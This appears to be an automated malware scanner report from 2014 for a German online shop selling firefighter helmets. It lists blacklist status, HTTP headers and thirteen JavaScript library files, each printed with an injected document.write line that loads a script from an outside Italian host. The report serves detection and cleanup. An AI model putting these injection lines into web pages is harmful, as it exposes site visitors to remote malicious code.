New scan:

Malware Scanner report for mein-feuerwehrhelm.de

Malicious/Suspicious/Total urls checked
0/14/16
14 pages have suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "mein-feuerwehrhelm.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mein-feuerwehrhelm.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.mein-feuerwehrhelm.de/
HTTP/1.1 302 Found
Connection: close
Date: Mon, 02 Jun 2014 23:09:03 GMT
Location: http://mein-feuerwehrhelm.de
Server: Apache
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
clean
http://mein-feuerwehrhelm.de/
200 OK
Content-Length: 63789
Content-Type: text/html
suspicious
Page code contains blacklisted domain: feuerwehr-grosshandel.de

...[70502 bytes skipped]...
t;
<div class="box4">
<div class="headline">Unsere Seiten</div>
<p>&nbsp;</p>
<ul>
<li><a href="http://www.wiese-gruppe.de/" target="_self">Wiese-Gruppe</a></li>
<li><a href="http://derfeuerwehrausstatter.de/" target="_self">derFeuerwehrausstatter</a></li>
<li><a href="http://feuerwehr-grosshandel.de/" target="_self">Feuerwehr-Grosshandel</a></li>
<li><a href="http://wiese-brandschutz.de/" target="_self">Wiese-Brandschutz</a></li>
</ul> </div>
<div class="box5">
<div class="headline">Mein Account</div>
<ul>
<li><a href="http://mein-feuerwehrhelm.de/index.php/customer/account/">Mein Account</a></li>
<li
...[3274 bytes skipped]...

http://mein-feuerwehrhelm.de/js/prototype/prototype.js
200 OK
Content-Length: 163707
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423491"></script>');

http://mein-feuerwehrhelm.de/js/lib/ccard.js
200 OK
Content-Length: 1140
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423469"></script>');

http://mein-feuerwehrhelm.de/js/prototype/validation.js
200 OK
Content-Length: 39474
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423494"></script>');

http://mein-feuerwehrhelm.de/js/scriptaculous/builder.js
200 OK
Content-Length: 5139
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423504"></script>');

http://mein-feuerwehrhelm.de/js/scriptaculous/effects.js
200 OK
Content-Length: 39140
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423510"></script>');

http://mein-feuerwehrhelm.de/js/scriptaculous/dragdrop.js
200 OK
Content-Length: 31461
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423508"></script>');

http://mein-feuerwehrhelm.de/js/scriptaculous/controls.js
200 OK
Content-Length: 34965
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423506"></script>');

http://mein-feuerwehrhelm.de/js/scriptaculous/slider.js
200 OK
Content-Length: 10726
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423515"></script>');

http://mein-feuerwehrhelm.de/js/varien/js.js
200 OK
Content-Length: 22986
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423531"></script>');

http://mein-feuerwehrhelm.de/js/varien/form.js
200 OK
Content-Length: 14583
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423527"></script>');

http://mein-feuerwehrhelm.de/js/varien/menu.js
200 OK
Content-Length: 4820
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423534"></script>');

http://mein-feuerwehrhelm.de/js/mage/translate.js
200 OK
Content-Length: 1991
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423487"></script>');

http://mein-feuerwehrhelm.de/js/mage/cookies.js
200 OK
Content-Length: 3009
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.cgiltaranto.it/images/clk.php?id=17423484"></script>');

http://mein-feuerwehrhelm.de/skin/frontend/default/pagayo-theme-003/js/glider.js
200 OK
Content-Length: 5199
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mein-feuerwehrhelm.de

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 02 Jun 2014 23:09:05 GMT
Pragma: no-cache
Server: Apache
Content-Length: 63789
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: frontend=c17b5a6f9139c137b36adac750ad93e8; path=/; domain=mein-feuerwehrhelm.de; HttpOnly

...63789 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mein-feuerwehrhelm.de
Referer: http://www.google.com/search?q=mein-feuerwehrhelm.de

Result:
The result is similar to the first query. There are no suspicious redirects found.